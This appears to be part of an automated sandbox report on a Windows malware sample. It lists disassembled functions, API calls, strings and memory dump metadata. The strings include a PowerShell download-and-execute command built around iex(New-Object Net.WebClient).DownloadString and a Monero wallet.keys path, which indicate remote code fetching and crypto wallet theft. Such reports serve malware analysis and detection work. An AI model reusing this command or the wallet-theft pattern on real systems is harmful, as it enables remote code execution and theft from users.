ExitProcess.KERNEL32 ref: 00BF67A5
ExitProcess.KERNEL32 ref: 00BF67AF
ExitProcess.KERNEL32 ref: 00BF67B9
ExitProcess.KERNEL32 ref: 00BF67C3
ExitProcess.KERNEL32 ref: 00BF67CD

Strings

*, xrefs: 00BF678C

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: f6f69557cfc55a999802c8700e52c0b74cfb073db0dd06ad38b1ce4f37be9c04
Instruction ID: 5b5291c18519f31b3525faa8a4f459ad41e7b1d9ec0fc2dc540a1e1a2b3b16f8
Opcode Fuzzy Hash: f6f69557cfc55a999802c8700e52c0b74cfb073db0dd06ad38b1ce4f37be9c04
Instruction Fuzzy Hash: 67F05430904209EFD354AFE1E90972CBB70FB14703F0801A9EA05D7290D6704F46DB9A

Function 00BF2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

ShellExecuteEx.SHELL32(0000003C), ref: 00BF2D85

Strings

<, xrefs: 00BF2D39
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00BF2D04
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00BF2CC4
')", xrefs: 00BF2CB3

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: 67a75e99c9ab22d3a9f5a956eb9649ae7c823dd132819a9d604afd2de9f7e23a
Instruction ID: c4e169f30445f9e99c0583fd80dcc088f4d655b5b805e5e376cfe19bde110856
Opcode Fuzzy Hash: 67a75e99c9ab22d3a9f5a956eb9649ae7c823dd132819a9d604afd2de9f7e23a
Instruction Fuzzy Hash: 2441B2B1C1010C9ADB18FBA4C891BFDB7B4AF14340F5081A9E61AB7195DFB46A4ECF91

Function 00BE9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00BE9F41

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Strings

@, xrefs: 00BE9EF1
v20, xrefs: 00BE9E21
v10, xrefs: 00BE9EA3
ERROR_RUN_EXTRACTOR, xrefs: 00BE9E67

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 4171519190-1096346117
Opcode ID: ef2220a39d79e1109ad4e34630fab125cebfccd6ce7355d8eab91b1881436ce6
Instruction ID: 27b5cd45dbd9dc103ebec9cd8ec57abe648a3f4c577b5ab33bb99d536664d66d
Opcode Fuzzy Hash: ef2220a39d79e1109ad4e34630fab125cebfccd6ce7355d8eab91b1881436ce6
Instruction Fuzzy Hash: 08612F70A1024CDBDB28EFA5CC96FED77F9AF44340F108458FA095B191DB746A09CB52

Function 00BF6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00BF696C
sscanf.NTDLL ref: 00BF6999
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BF69B2
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BF69C0
ExitProcess.KERNEL32 ref: 00BF69DA

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 6673cf06c561d0d1a6337bd7ae052ed8471d35ca76f7ba93ed46e4b6e634b5c9
Instruction ID: 78926d6dbf31ae357fd66aaa829dc88c026af846b8a6c046be219210755ded8c
Opcode Fuzzy Hash: 6673cf06c561d0d1a6337bd7ae052ed8471d35ca76f7ba93ed46e4b6e634b5c9
Instruction Fuzzy Hash: 7A21B8B5D1420CAFCB18EFE4D949AEEB7B5FF48300F04856AE506B3250EB745609CB69

Function 00BF9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(0173DF40,?,?,?,00BF140C,?,0173DF40,00000000), ref: 00BF926C
lstrcpyn.KERNEL32(00E2AB88,0173DF40,0173DF40,?,00BF140C,?,0173DF40), ref: 00BF9290
lstrlen.KERNEL32(?,?,00BF140C,?,0173DF40), ref: 00BF92A7
wsprintfA.USER32 ref: 00BF92C7

Strings

%s%s, xrefs: 00BF92B5

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: e24a02f302a9fcb62095cd3e5741c02a6b6e8a60774384eca7af35bf8e1dfc06
Instruction ID: 6382e366ad5bd20132448ea0d816c261e0ef66d243710b445604c94bd09895f8
Opcode Fuzzy Hash: e24a02f302a9fcb62095cd3e5741c02a6b6e8a60774384eca7af35bf8e1dfc06
Instruction Fuzzy Hash: C0011A7550020CFFCB04DFECD988EAE7BB9EB48350F188168F909AB240C631AA45DB91

Function 00BFC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtGetStringTypeA.LIBCMT ref: 00BFC8EC
___crtLCMapStringA.LIBCMT ref: 00BFC90C
___crtLCMapStringA.LIBCMT ref: 00BFC931

Strings

, xrefs: 00BFC896

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Type
String ID:
API String ID: 2109742289-3916222277
Opcode ID: 150a97c57427517e6e9b7d4533df9c5ee08edf763ae1d6664d7acad20fb5c21b
Instruction ID: 481ad2cc20a763064416d6d256c2c408213f7b7801a29193981f12bfa14511dd
Opcode Fuzzy Hash: 150a97c57427517e6e9b7d4533df9c5ee08edf763ae1d6664d7acad20fb5c21b
Instruction Fuzzy Hash: 1C41D77150075C5EDB228B248D84FFBBFE99F45704F1484E8EA8A87182D2719A88DF60

Function 00BF6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00BF6663

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

ShellExecuteEx.SHELL32(0000003C), ref: 00BF6726
ExitProcess.KERNEL32 ref: 00BF6755

Strings

<, xrefs: 00BF66D9

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: c0c6ff3982d74508637a5eed0db50bccc27278644cc0bee96e17ac723481189c
Instruction ID: a9adc6500fb6596487f44e6502bb49a7a8e24f505d32a68570b76133c1253038
Opcode Fuzzy Hash: c0c6ff3982d74508637a5eed0db50bccc27278644cc0bee96e17ac723481189c
Instruction Fuzzy Hash: 1231D8B1801218ABDB18EB50DC95BEEB7B8AF44300F405199F30977191DFB46A4DCF9A

Function 00BF87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C00E28,00000000,?), ref: 00BF882F
RtlAllocateHeap.NTDLL(00000000), ref: 00BF8836
wsprintfA.USER32 ref: 00BF8850

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Strings

%dx%d, xrefs: 00BF8847

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
